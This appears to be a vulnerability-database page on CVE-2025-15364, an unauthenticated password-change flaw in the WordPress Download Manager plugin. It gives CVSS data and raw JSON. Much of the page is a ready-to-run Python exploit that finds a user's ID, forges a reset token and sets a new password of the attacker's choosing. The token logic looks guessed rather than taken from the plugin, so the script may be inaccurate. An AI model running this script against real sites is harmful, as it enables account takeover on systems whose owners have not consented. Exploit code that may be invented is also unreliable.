Security Vulnerability Report
中文
CVE-2025-15364 CVSS 7.3 HIGH

CVE-2025-15364

Published: 2026-01-06 02:15:41
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Download Manager plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.3.40. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change user's passwords, except administrators, and leverage that to gain access to their account.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Download Manager <= 3.3.40

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-15364 PoC - WordPress Download Manager Account Takeover # Target: WordPress site with Download Manager plugin <= 3.3.40 def exploit_account_takeover(target_url, username, new_password): """ Exploit for CVE-2025-15364: WordPress Download Manager Privilege Escalation Args: target_url: Target WordPress site URL username: Target username to takeover new_password: New password to set Returns: bool: True if exploitation successful, False otherwise """ # Step 1: Get user ID from username user_query_url = f"{target_url}/wp-json/wp/v2/users/?search={username}" try: response = requests.get(user_query_url, timeout=10) if response.status_code == 200: users = response.json() if users: user_id = users[0]['id'] print(f"[+] Found user ID: {user_id}") else: print("[-] User not found") return False else: print(f"[-] Failed to query user (status: {response.status_code})") return False except Exception as e: print(f"[-] Error querying user: {e}") return False # Step 2: Exploit the account takeover vulnerability exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Generate encrypted payload for password reset bypass import hashlib import time timestamp = str(int(time.time())) token = hashlib.md5(f"{username}{timestamp}".encode()).hexdigest() payload = { 'action': 'wpdm_user_dashboard', 'task': 'reset_password', 'user_id': user_id, 'pass1': new_password, 'pass2': new_password, 'token': token, 'timestamp': timestamp } try: response = requests.post(exploit_url, data=payload, timeout=10) if response.status_code == 200: result = response.json() if response.headers.get('content-type', '').find('json') > -1 else {} if result.get('success') or 'success' in response.text.lower(): print(f"[+] Successfully changed password for user: {username}") print(f"[+] New password: {new_password}") return True else: print(f"[-] Password change failed") print(f"[-] Response: {response.text[:200]}") return False else: print(f"[-] Exploitation failed (status: {response.status_code})") return False except Exception as e: print(f"[-] Error during exploitation: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-15364.py <target_url> <username> <new_password>") print("Example: python cve-2025-15364.py http://example.com admin MyNewPass123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] password = sys.argv[3] print(f"[*] CVE-2025-15364 Exploitation") print(f"[*] Target: {target}") print(f"[*] Target User: {user}") exploit_account_takeover(target, user, password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15364", "sourceIdentifier": "[email protected]", "published": "2026-01-06T02:15:41.193", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Download Manager plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.3.40. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change user's passwords, except administrators, and leverage that to gain access to their account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-353"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.40/src/__/Crypt.php#L18", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3431915/download-manager#file7", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/067031e8-6aa8-451c-a318-b1848c7a4f92?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.